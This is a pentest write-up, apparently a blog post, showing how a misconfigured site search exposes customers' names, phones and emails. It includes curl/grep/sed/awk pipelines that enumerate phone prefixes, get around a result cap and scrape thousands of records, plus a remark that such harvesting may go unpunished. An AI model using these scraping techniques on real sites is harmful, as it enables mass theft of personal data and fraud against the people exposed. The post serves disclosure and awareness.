Data leaks without hacking

Sometimes, to get personal or other private information there is no need to crack the system. Web-site owners and/or system administrators have not set policies and rules properly that allows getting unauthorized privileged access or read closed data. The most important thing is that kind of information is publicly available and hackers may not be punished at all for an any activity with it (at least by the Russian law). In this article I will show one of my recent construction company pentest and what issues I’ve been able to reveal.

Reconnaissance

The pentest area is a web-site based on the 1C-Bitrix CMS upon the NGinx web-server. Based on the whois output, the site is situated on the Russian public web-hosting. I assume there is a simple VPS (virtual private server) because it’s unnecessary to hold the high-performance system for a simple informer site.

Let’s look at the web-site and try to find any useful information.

I updated the /etc/hosts file, and now our construction company web-site is reached by www.victim.host address.

https://www.victim.host

From the first view there are some rooms where we can interact within the site: an auth form and a search field. The last one is more preferred to attack due to it shouldn’t send any alerts to the administrator for using wrong passwords.

https://www.victim.host/search/?q=search+field

Find the right payload

In several minutes I found an interesting request. If try to enter some email pattern, for instance @gmail.com, the system shows me the client’s full name, cell phone number and email.

https://www.victim.host/search/index.php?tags=&how=r&q=%40gmail&PAGEN_2=1

Can you imagine? You can harvest all the sensitive and personal information just make the right query. Ok, what’s next?

The further investigation revealed that there is a restriction of 500 responses for a request. How can we brake that rule and make a restriction evasion?

As you may know, all the Russian phone number prefixes start from 8(901) and finish to 8(999). So, we have a pool from 8(901)000-00-01 till 8(999)999-99-99. What if we try to make a search by the phone prefix?

https://www.victim.host/search/index.php?tags=&how=r&q=8903

Nice 🙂 But, as you can see, for 8903 there are still 500 responses. To fix it and get all the data, we can narrow our request by adding the next digit like 89030, 89031, 89032 etc. Nevertheless, that kind of queries are quite enough for our Proof of Concept.

Proof of Concept

3.1 Get the info

Ok, let’s dig deeper and try to understand the output – look at the source code

view-source:https://www.victim.host/search/?q=8903

We got 3 lines: the full name, the phone (and my search query is between the html bold tags) and the email. Each answer starts from the search-preview class name. Let’s use search-preview as a starting point.

curl –s “https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1” | grep –i “search-preview” –A 2

It works but there are plenty of trash. Let’s clean it a little. We have to delete html bold tags, replace each new line and tab by comma (,) and — by new line.

curl –s “https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1” | grep –i “search-preview” –A 2 | tr ‘\n\r\t’ ‘,’ | sed –z ‘s/--/\n/g’ | sed ‘s///g’ | sed ‘s/<\/b>//g’

A little bit more: replace that bulk of commas and <>.

curl –s “https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1” | grep –i “search-preview” –A 2 | tr ‘\n\r\t’ ‘,’ | sed –z ‘s/--/\n/g’ | sed ‘s///g’ | sed ‘s/<\/b>//g’ | sed ‘s/,,,,,,,,/,/g’ | sed ‘s/,,/,/g’ | tr ‘\>\<’ ‘,’

All it has to be done is to output the data in a right format. AWK will help us.

curl –s “https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1” | grep –i “search-preview” –A 2 | tr ‘\n\r\t’ ‘,’ | sed –z ‘s/--/\n/g’ | sed ‘s///g’ | sed ‘s/<\/b>//g’ | sed ‘s/,,,,,,,,/,/g’ | sed ‘s/,,/,/g’ | tr ‘\>\<’ ‘,’ | awk –F’,’ ‘{print $4 “|” $5 “|” $6}’

Excellent. We got a clean formatted output. Let’s go further.

3.2 Pagination
The next issue we have to solve is a pagination. What is the problem? All of 500 responses split into pages, which consist of 10 answers. So we have to harvest the first 10 lines, then move to the page 2 and harvest other 10 lines and so on. But how we know how many pages we have?

https://www.victim.host/search/?q=8903&PAGEN_2=5

In this particular situation we have 2 possible ways. But I will suggest the next. We just have to divide quantity of all answers (for instants 500) by 10 (lines per page) and add 1.

curl –s https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1 | grep –i “Найдено” | grep –o “[0-9]*”

let pages=$(curl –s https://www.$victim/search/index.php?tags=&how=r&q=8903&PAGEN_2=1 | grep –i “Найдено” | grep –o “[0-9]*”)/10+1; echo $pages;

3.3 Full script
The last thing we have to do is to combine our lines into a beautiful code. We declare the victim web-site, quantity of phone prefixes and make 2 loops for both of pagination and phone prefixes. All the harvested data we write into info.txt text file.

Now the time for launch script has come.

bash get-information.sh

It took 27 minutes to execute the script at all and got the information. As you may see our script was able to find personal information for 5650 Russian citizens which include first and last names, email and phone number.

echo ; wc -l info.txt ; echo; head info. txt

Conclusion
That kind of information is quite enough to make a further social engineering attack, password brute force and reuse attack and, of cause, fraud.
Generally speaking, a little misconfiguration leads to a huge issue for the company and for the more than 5k+ people.
Please, be careful.

Ivan Glinkin